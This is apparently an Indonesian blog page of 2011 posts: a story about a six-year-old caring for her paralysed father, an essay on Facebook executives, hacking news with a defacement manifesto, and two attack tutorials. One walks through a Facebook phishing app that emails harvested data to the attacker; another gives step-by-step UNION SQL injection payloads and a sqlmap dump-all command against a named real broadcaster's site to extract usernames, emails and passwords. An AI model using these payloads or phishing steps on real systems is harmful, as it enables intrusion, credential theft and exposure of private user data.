Main Menu

Hellcome To my Blog site , visit my facebook:riyan facebook. بِسْــــــــــــــمِ اللهِ الرَّحْمَنِ الرَّحِيْـــــمِ

Saturday, September 24, 2011

Kisah Anak 6 Tahun, Memulung Demi Menghidupi Ayahnya yang Lumpuh



Satu lagi sebuah kisah yang sangat mengharukan dari Negeri Tirai Bambu, seorang anak kecil di Dajiyuan, menghidupi ayahnya yang lumpuh dengan menjadi seorang pemulung. Karena ayahnya lumpuh bertahun-tahun, anak yang baru berumur 6 tahun ini terpaksa memikul tanggung jawab rumah tangga. Selain setiap hari mencuci muka ayahnya, memijat dan memberi makan, dia masih bersama ibunya mengambil botol air mineral bekas sebagai tambahan pendapatan keluarga. Cerita Tse Tse ini banyak menyentuh hati teman di internet, hanya beberapa jam, sudah puluhan ribu orang yang mengkliknya.

Adegan yang mengharukan

Begitu sampai di rumah, Tse Tse langsung sibuk menyiapkan seember air, lantas dengan tangannya yang mungil ia memeras selembar handuk yang besar, karena handuk terlalu besar buat dia, Tse Tse membutuhkan 3 sampai 4 menit baru bisa mengeringkannya, kemudian dengan handuk itu dia menyeka wajah ayahnya dengan lap itu. Dia sangat teliti melapnya, sepertinya khawatir kurang bersih. Setelah selesai, Tse Tse kemudian berjingkat melap punggung ayahnya, di belakang, selesai semua, dengan puas dia tersenyum ke ayahnya.

Tse Tse tahun ini berumur 6 tahun, baru kelas 1 SD, tinggal di jalan Baoan, desa Nantong, papanya Xiong Chun pada 5 tahun lalu tiba-tiba menderita otot menyusut, di bawah leher semua lumpuh, untuk mengobati penyakitnya dia telah menghabiskan semua tabungannya. Sekarang, keluarga yang beranggotakan 3 orang ini hanya mengandalkan ibunya yang bekerja di pabrik, dengan penghasilan kecil itulah mereka bertahan hidup.

Di sekolah Houde, anak yang seumur dengannya dengan ceria bergandeng tangan dengan orang tuanya sambil berjalan, namun Tse Tse malah harus sekuat tenaga mendorong ayahnya pulang. Ketika mau menyeberang jalan, dia akan berhenti sejenak, menoleh kendaraan yang lalu lalang, setelah aman dia baru menyeberang. Setiap ketemu tempat yang tidak rata, Tse Tse harus mengeluarkan tenaga ekstra menaikkan roda depan, menarik kursi roda itu dari belakang, wajahnya yang mungil sampai terlihat kemerahan. Dari sekolah sampai rumah jaraknya sekitar 1.500 meter, harus ditempuh selama 20 menit.

Satu keluarga 3 orang menempati rumah 8 m2

Rumah Tse Tse adalah sebuah rumah dengan kamar kecil seukuran 8m2, hanya besi seng menutupi atap yang menghalangi cahaya masuk ke kamar, di atap tergantung sebuah lampu energi kecil. Dalam rumah penuh debu, yang paling mencolok adalah penghargaan Tse Tse yang tergantung di dinding. Terhadap sekeluarga yang pendapatan bulanannya hanya sekitar 1.000 RMB (Rp. 1,5 juta) bisa dikatakan, sebuah TV 21″ sudah merupakan barang mewah.



Sebuah ranjang atas dan bawah sudah memenuhi seluruh kamar, di atasnya penuh dengan barang pecah belah, hanya tersisa sedikit ruang kecil. Xiong Chun berkata, itu adalah ranjang Tse Tse. Sebuah meja lipat tergantung di dinding, itu adalah meja belajar Tse Tse, juga adalah meja makan keluarga.

Di samping pintu yang luasnya tidak sampai 1 m2, ada "dapur" yang dibuatnya sendiri, di samping kompor masih tersisa sebatang kubis. "Makanan dan minyak di rumah semua diberikan oleh teman mamanya, satu hari tiga kali makan, Cuma makan malam yang agak lumayan, di rumah jarang makan daging, namun setiap minggu mereka akan mengeluarkan sedikit biaya untuk mengubah kehidupan anaknya, namun setiap kali makan, Tse Tse akan membiarkan saya makan dulu, baru dia makan." Kata Xiong Chun.

Setiap hari memijat papanya 3 kali

Mama Tse Tse bekerja di pabrik, setiap siang hari dia akan menyisakan sedikit waktu pulang ke rumah menanak nasi untuk suaminya, setelah menyuapi dia segera balik ke pabrik bekerja, tanggung jawab merawat suaminya semua di bebankan ke pundak Tse Tse.

Xiong Chun memberitahu wartawan, setiap pagi jam 6.30 begitu jam alarm berbunyi, Tse Tse akan bangun, cuci muka dan sikat gigi, dia juga membantu papanya mencuci muka, selesai itu dia akan memijat tangan dan kaki papanya, kira-kira 10 menit. Pulang sekolah sore, dia akan memijat papanya lagi, malam setelah memandikan papanya, dia akan memijat papanya lagi, baru tidur.

"Agar bisa lebih banyak membantu mamanya, Tse Tse kadang-kadang ikut mamanya memungut barang bekas untuk menambah penghasilan keluarga. "Xiong Chun sangat sayang anaknya. Tetangga di sekeliling sangat terharu dan mengatakan: "Tse Tse sangat mengerti. Kita semua merasa bangga ada anak seperti ini."
Boneka 5 Yuan yang paling disukainya

Mama membawa dia memungut botol air bekas untuk menambah penghasilan. Suatu ketika, Tse Tse memungut satu mainan mobil plastik bekas di tempat sampah, dia bagaikan mendapat barang pusaka, setiap hari akan main sebentar dengan mobil plastiknya itu. Yang Xianfui berkata, kemarin mama dan anak pergi memungut besi bekas, bisa dijual 20 Yuan.



Tse Tse punya satu boneka kecil yang lucu, itu yang paling disayanginya. Malam hari juga mengendongnya tidur. "Dia melihat boneka itu di toko, beberapa kali dia memintanya, 5 Yuan, saya tidak tega terus, akhirnya saya nekat membelikannya," Kata Xiong Chun.

Begitu Tidak Boleh Sekolah, Langsung Menangis

Untuk mengirit biaya listrik,setiap hari begitu pulang sekolah Tse Tse akan memindahkan "Meja kecilnya" keluar, mengejar siang hari menyelesaikan PR-nya. "Uang sekolahnya setahun sekitar 3.000 sampai 4.000, kami tidak sanggup. Karena tidak ada uang, tahun ini saya juga melepaskan berobat lagi," kata Xiong Chun. Beberapa waktu yang lalu, dia berbicara dengan istrinya agar Tse Tse berhenti sekolah saja, Tse Tse begitu tahu langsung menangis.
Continue Reading

Friday, September 23, 2011

Hack facebook Via Facebook

Tata cara nya sebagai berikut:

1. Download scriptnya dulu
http://www.mediafire.com/?448qgmyux5o2mb8 atau http://idws.us/jjfjdc
2. Cari
server gratisan atau injekkan yang support .PHP ( tanya om Google ) atau .ASP ( http://www.jabry.net )
3. Facebook tentunya
Mulai pembuatannya deh :
Sudah disiapkan scriptnya?? kalau sudah, ubahlah di bagian yang saya tandai menjadi alamat e-mail anda

.PHP  Code:



.ASP Code:

lalu upload ke server anda..dan tugas pertama kita selesai. :)

Lalu masuk ke http://www.facebook.com/pages/create dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.
Disini dituntut kepandaian kita mengolah kata agar berkesan menarik. Contoh "Cek Kepopuleran FB Anda" dan selesaikan langkah yang di anjurkan.
Kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana. Kalau udah di kolom "Alamat Web" kita isi
http://www.facebook.com/ lalu selesai deh.
Saatnya kita masuk ke
http://www.facebook.com/add.php?api_key=...1e44&pages dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang sudah didownload tadi.
Jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita. Lihat gambar dibawah ini




Dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he

[Image: sshot5e.jpg]
Courtesy Of j0ck3rReferensi : The Hacker News
Continue Reading

I was once a Facebook fool

It was interesting observing the flurry of Facebook integration announcements in the past 24 hours, especially regarding music services. Back in the day, I had helped convince then-Apple employee Dave Morin to join Facebook to build what became the Facebook Platform, and had hacked together one of the first music applications, Audio, on the then-day-old platform.
I never really talked about what happened to Audio; however, in seeing that so many businesses and people seem hell-bent on integrating ever-further with Facebook, I figured I'd provide a cautionary tale.
At the time of my creation of Audio, it turned out that Facebook had already cut some sort of deal to help iLike -- thus, in some strange way completely unknown to me, I was operating outside of the "plan." While Dave Morin worked quietly and bravely to defend me against the moves of iLike and Facebook executives to shut down Audio, he eventually found himself as a casualty in a greater power play quietly orchestrated by Sean Parker and Mark Zuckerberg, in which he was demoted and replaced by Chamath Palihapitiya. Chamath had been previously known to me from my friends at Winamp as "the guy who fucked Winamp," (after Winamp had been sold to AOL) and seemed like a pretty lame dude. Turns out that he had cut a backroom deal with Sean Parker to enable easy exporting of social graphs from AOL/AIM into Facebook -- and in return, as soon as the Platform appeared to be successful, Dave Morin was ousted from his job and Chamath was hired with $90 million in Facebook stock.
As soon as Chamath took over from Morin, I immediately started to hear more and more about how the record labels were about to shut down Audio due to copyright demands. In fact, Chamath would call and email my business partner and I on a regular basis to tell us that the app was about to be shut down -- and every time he did, I would have to frantically stave him off, telling him about how we were cutting deals with the labels to bring them on board and get licenses. What I didn't realize at the time, however, is that it was this very assurance of label support that was actually screwing me over with Facebook, as Chamath was basically just trying to shut down Audio to help his friends at iLike. Once he got word that we were in the final stages of a major round of funding from Universal Music and two of the other big four labels, he immediately shut down the app and thus killed the whole business. The funny thing about the final phone call from Chamath was that he claimed that Universal Music's general counsel had sent him a notice saying they would sue Facebook if they didn't shut down Audio -- but when he called me, I was sitting in Jimmy Iovine's office; Jimmy personally called the GC of Universal who told him the entire story was complete bullshit.
(Many of Audio's old users wondered why I never updated the app or fixed many of their complaints -- now you know what I was dealing with!)
I remember having a call with Sean Parker, who I then considered to be a friend, explaining my problems with Audio before its collapse. "It will never work," he said to me. "You'll see what I mean." I would have never thought that Parker would have been pulling such crazy shit on me at the time, but hey -- you live and you learn.
If you are entrusting your life data to Facebook, or if you are depending on Facebook and its platform for your livelihood, beware. In the real Facebook world, there is no trust, and there is no friendship -- there is only money and power. Think really hard -- really, think -- before trusting Facebook or its employees with anything. Don't be a Facebook fool.
Continue Reading

Pengamat TI: Ada 65 Ribu Peretas di Indonesia

Jakarta, CyberNews. Pengamat TI Onno W Purbo mengemukakan ada puluhan ribu peretas dunia maya di Indonesia. "Indonesia memiliki 65 ribu peretas dan basis terbesar di Yogyakarta, peretas di Jogja lebih aktif dan kreatif," kata dia di Jakarta, Kamis (22/9).
Onno W Purbo mengemukakan hal itu ketika menghadiri acara peluncuran Norton Internet Security dan Norton Anti Virus 2012. Menurut kajiannya, peretas akan terus berkembang. Perguruan tinggi, menurutnya, adalah "kawah candradimuka" untuk belajar dan membuat virus.
"Peretas di Jogja meluncurkan suatu aplikasi seputar peretasan yang bernama X-Code dan bisa diunduh gratis di Internet," katanya.
Karya peretas misalnya adalah virus lokal yang mampu memformat hard drive tanpa seijin pemilik perangkat komputer, mencuri data kartu kredit. Virus yang ia contohkan itu juga mampu membobol akun jejering sosial pemilik komputer, seperti Facebook dengan menjebol akun emailnya terlebih dahulu.
Yang hebat dari seorang peretas, kata Ono, bukan saja mampu membuat virus dan mengambil data seseorang untuk kepentingan pribadi, tapi juga membuat sistem keamanan yang kuat supaya tidak bisa ditembus oleh para peretas lainnya.
Kriteria menjadi peretas yang hebat, haruslah orang tersebut benar-benar suka komputer, katanya. "Istilahnya computer geek. Kata siapa gampang? Dia bisa nggak tidur tujuh hari tujuh malam melototin komputer," katanya berkelakar.
( Ant / CN33 )
Continue Reading

Thursday, September 22, 2011

Kominfo Hacked Again


Screenshot Situs Kominfo yang Disusupi (Ist.)
Jakarta - Entah karena ingin mengekspresikan kekecewaan terhadap pemerintah atau karena sebab lain, akhir-akhir ini hacker membidik sasarannya ke situs-situs lembaga pemerintahan. Setelah situs Polri, Lemhanas, dan Pertamina, situs Kementerian Komunikasi dan Informatika (Kominfo) ikut disusupi. Sialnya, ini bukan yang pertama kali.

Situs yang beralamat di www.depkominfo.go.id itu, saat dikunjungi detikINET, Selasa (31/5/2011) tidak bisa diakses seperti biasa. Namun sebelumnya, detikINET sempat menemukan halaman khusus yang dibuat para peretas itu.

[+] HACKER MANIFESTO [+]

[+] This is our world now...!!! [+]
[+] the world of the electron and the switch, the beauty of the baud. [+]
[+] We make use of a service already existing without paying for what could be dirt-cheap [+]
[+] if it wasn't run by profiteering gluttons, [+]
[+] and you call us criminals...!!! [+]

[+] We explore... [+]
[+] and you call us criminals...!!! [+]
[+] We seek after knowledge... [+]
[+] and you call us criminals...!!! [+]
[+] We exist without skin color, without nationality, without religious bias... [+]
[+] and you call us criminals...!!! [+]
[+] You build atomic bombs, you wage wars, you murder, cheat, and lie to us [+]
[+] and try to make us believe it's for our own good, [+]
[+] yet we're the criminals...!!! [+]

[+] Yes, I am a criminal...!!! [+]
[+] My crime is that of curiosity...!!! [+]
[+] My crime is that of judging people by what they say and think, [+]
[+] not what they look like...!!! [+]
[+] My crime is that of outsmarting you, [+]
[+] something that you will never forgive me for...!!! [+]

[+] I am a hacker, and this is my manifesto. [+]
[+] You may stop me, but you can't stop us all....!!! [+]

demikian cuplikan pesan yang dituliskan hacker di halaman tersebut.

Dalam satu bulan, situs Kominfo mengalami dua kali kebobolan. Yang pertama pada 23 Mei silam. Kelompok hacker yang menamakan diri YOGYACARDERLINK tak hanya menampilkan halaman berisi protes terhadap kinerja Kominfo, tetapi juga mengklaim telah mendapatkan akses root dari situs Kominfo. Ini berarti, pelaku bisa dengan mudah menghapus semua data di server atau menjadikannya sebagai komputer 'zombie'.
Continue Reading

SQL injection di globaltv.co.id Exsposed

Mohon maaf sebelumnya, saya sudah mencoba menghubungi pihak technical dari globaltv tapi belum ada respon, saya tidak bermaksud untuk merusak apalai pamer skill(saya tidak bisa apa-apa, hanya seorang script kiddies), Bug ini ditemukan oleh seorang member devilzc0de.org, saya lupa nicknya, kemudian saya tertarik untuk mencoba melakukan penetrasi ke situs http://www.globaltv.co.id
situs ini terkena SQL injection pada banyak bagian (Error Based), situs ini menggunakan framework Codeigniter versi x (tidak tau), sama halnya seperti bug sql injection yang terjadi pada situs telkomsel yang pernah saya publish sebelumnya, Jika sebuah situs menggunakan framework Codeigniter, sedikit sulit untuk melakukan exploitasi melalui URL, karena Codeiginiter di lengkapi dengan filter-filter yang cukup tangguh untuk menghalangi jenis serangan ini, tetapi mungkin sang creator kelupaan untuk menggunakan fitur-fitur tersebut
Dari sekian banyak bug yang ada (sqli), saya memilih menggunakan bagian pencarian, karena metode dari pencarian menggunakan method POST bukan GET atau melalui form bukan di bawa melalui URL, dengan begitu filterisasi wildcard di URL bisa di bypass karena variable di bawa melalui form
Seperti biasa, untuk mnguji SQL injection bug , saya menggunakan singel quota (') atau %27 dalam url encode, ternyata globaltv(form search) menampilkan query error yang sangat rentan (informasi error based), karena jenis bug sqli merupakan error based saya mencoba menggunakan metode UNION based

a%') and 1=1#
a%') and 1=0#
Sql yang terjadi secara kasar pada proses pencarian di globaltv menggunakan operator like '%$keyword'% jadi mungkin sederhanya seperti berikut

Select from bla where keyword like '%$keyword%' AND .....
Jika kita menginjectnya menggunakan metode POST, kita memberikan SQL injection di bagian form search, dan berusaha membyapass bagian akhir dari perintah query, jika perintah query seperti sebelumnya, maka kita menjadikan query seperti berikut

Select from bla where keyword like '%a%') and 1=0#%' AND .....
Dengan begitu perintah SQL di belakang tanda # tidak akan di proses, kemudian kita melakukan order by untuk mencari jumlah kolom yang bisa kita inject, dengan menggunkan perintah order by di ikuti oleh jumlah kolom yang akan kita proses hingga kita mendapatkan kondisi TRUE (tidak error), seperti berikut

a%') and 1=0 order by 20# -> FALSE
a%') and 1=0 order by 19# -> TRUE
Dengan demikian kita tau bahwa jumlah kolom yang bisa kita inject berada di antara 1 - 19, kemudian kita memberikan perintah UNION SELECT untuk mencari kolom mana yang bisa kita inject, dengan perintah UNION SELECT akan menghasilkan sebuah angka (nomor kolom) yang bisa kita sisipi dengan perintah sql lainnya (multiple SQL Statment), seperti berikut

a%') and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
Dan Hasilnya Seperti berikut

Setelah kita menemukan Nomor kolom yang bisa di inject langkah selanjutnya adalah mencari tau informasi global, seperti username server, nama current database, dan versi dari mysql database, dengan memberikan perintah berikut

a%') and 1=0 union select 1,version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
Dan Hasilnya

Setelah mendapatkan informasi global seperti user(), version(), dan database(), langkah selanjutnya yaitu mencari nama-nama tabel yang ada dalam database tersebut, selain perintah user(), version(), dan database() masih banyak lagi perintah yang bisa kita gunakana untuk mencari tau informasi tentang server target

a%') and 1=0 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()#
Dengan memberikan perintah tersebut akan mengeluarkan semua tabel yang ada dalam database server, group_concat merupakan sebuah fungsi (sintak) dalam mysql agar hasilnya dalam bentuk group (mungkin :D), selain group_concat bisa menggunakan concat_ws atau yang laiinya, berikut hasil dari code di atas

Setelah memperhatikan nama-nama tabel di atas, ada 3 buah tabel yang menurut saya paling kritik, seperti member, users dan tbl_user, untuk itu saya memilih tbl_user, karena tabel itu kemungkinan menyimpan username dan password sang admin, untuk membaca isi dari tabel user terlebih dahulu kita harus mencari tau nama field (kolom) yang ada dalam tbl_user tersebut,dengan menggunakan perintah

a%') and 1=0 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=unhex(hex(tbl_user))#
Perintah tersebut akan menghasilkan nama-nama field(kolom) yang ada dalam tbl_suer, seperti berikut

Setelah mendapatkan nama-nama kolomnya, kini kita mencari tau isi dari kolom-kolom tersebut, pasti isinya menampilkan username dan password :D, dengan menggunakan perintah berikut

a%') and 1=0 union select 1,2,3,group_concat(username,0x3a,useremail,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from tbl_user#
Fungsi dari 0x3a merupakan bentuk hexa dari titik dua (:) maksudnya untuk membedakan tiap-tiap data yang muncul, hasilnya seperti berikut

Untuk mencoba selain tbl_user, saya mencoba tabel dengan nama users, karena menurut saya ini juga sangat riskan, caranya sama seperti di atas, menggunakan perintah yang sama, hanya saja nama tabel yang diganti menjadi users, seperti berikut

a%') and 1=0 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=unhex(hex(users))#
berikut screen shoot tampilan hasil dari scirp tersebut untuk tabel users

dan untuk membaca isi tabel tersebut kita harus mencari tau nama-nama fieldnya (kolom), dengan perintah yang juga sama dengan perintah sebelumnya

a%') and 1=0 union select 1,2,3,group_concat(user_username,0x3a,user_email,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from users#
Dan berikut hasilnya

Dengan cara di atas pun sudah cukup berbahaya bukan ? kita bisa membaca data yang sangat rahasia sifatnya (username, email, password) bahkan banyak email dan no telpon dari petugas, pelamar kerja dan lain sebagainya dalam situs globaltv tersebut, biasanya attacker tidak akan berhenti sampai disini (maaf saya tidak bisa memberitaukan halaman login admin :D), tetapi saya akan memberitaukan bagaimana mengambil semua isi database dari server globaltv.co.id (ini ilegal, jadi harap jangan di tiru)
Untuk meng-dump (meng-export) semua isi database server, bisa dengan cara manual, tetapi juga bisa dengan cara otomatis(dengan tools), jika kita menggunakan manual tentu saja sedikti repot karena banyaknya tabel dan kolom yang harus kita cari terlebih dahulu, tetapi dengan menggunakan SQLmap kita bisa melakukanny hanya dengan beberapa baris perintah, seperti berikut perintah sqlmap pada console

python sqlmap.py -f -b --current-db --current-user --password --dbs --tables --dump-all --data "keyword='" -u http://www.globaltv.co.id/search -v 0
Dengan perintah tersebut sqlmap akan melakukan semua untuk kita, dan akan meng-extract seluruh isi database, jika database lebih dari satu makan tidak terkecuali, semua database akan di extract, berikut hasil dari penggunaan tools sqlmap pada globaltv.co.id

Saya juga mendokumentasikan aksi ujicoba penetrasi ini dalam bentuk video, nanti akan saya upload ke youtube sebagai media pembelajaarn terhadap aksi nyata (bukan merusak)
Ini videonya, silahkan di download Nonton / Download video
Saya mempublish ini bertujuan untuk pembelajaran semata, bukan untuk merusak apalagi apmer skill, sekali lagi saya mohon maaf untuk pihak globaltv.co.id, pesan saya silahkan perbaiki security website anda, saya tidak melakukan pengrusakan apalagi menyebarkan informasi member yang ada pada situs anda
Thanks for Reading

source :http://khairu.net/index.php/page/artikel/23/SQL_injection_di_globaltv.co.id__Exsposed
Continue Reading